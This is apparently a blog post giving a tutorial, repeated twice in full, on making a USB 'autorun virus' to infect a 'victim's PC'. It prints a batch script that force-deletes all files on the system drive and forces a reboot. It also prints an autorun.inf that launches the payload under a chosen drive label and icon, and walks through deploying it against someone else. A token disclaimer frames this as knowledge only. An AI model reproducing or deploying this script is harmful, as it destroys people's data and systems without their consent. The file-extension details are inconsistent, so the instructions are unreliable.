How to make a autorun virus
*I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept*
This tutorial show you how to make an autorun virus with a USB flash drive!
Atfirst open a notepad and pest the following codes:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code giving .bat extension.and now your virus is ready.
Now plug in your USB flash drive into your pc, open my computer and open where the USB has been plugged in,Put Your Virus in Your USB now we need to right click and then goto 'New >' and click text document save it as autorun.inf now double click it or open it with notepad and type in the following :
[autorun]
open=Your Virus Name.exe
action=Program
label=Flash Drive Name..
icon=Icon.ico OR Icon.exe
Here Is what these Commands Do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon
How To Use
Plug Your USB Flash Drive Into The Victims PC And Press Enter!
BAM! They've Got Your Virus!
*I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept*
This tutorial show you how to make an autorun virus with a USB flash drive!
Atfirst open a notepad and pest the following codes:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code giving .bat extension.and now your virus is ready.
Now plug in your USB flash drive into your pc, open my computer and open where the USB has been plugged in,Put Your Virus in Your USB now we need to right click and then goto 'New >' and click text document save it as autorun.inf now double click it or open it with notepad and type in the following :
[autorun]
open=Your Virus Name.exe
action=Program
label=Flash Drive Name..
icon=Icon.ico OR Icon.exe
Here Is what these Commands Do :
'open=' opens a specific file you want in your flash drive, Put Your Virus Name .exe
'action=' is what will be displayed on the autorun menu, you can name it anything really.
'label=' it will rename your flash drive to whatever is after the =
'icon=' will change the icon of the flash drive u can use a .exe icon or a .ico icon
How To Use
Plug Your USB Flash Drive Into The Victims PC And Press Enter!
BAM! They've Got Your Virus!
No comments:
Post a Comment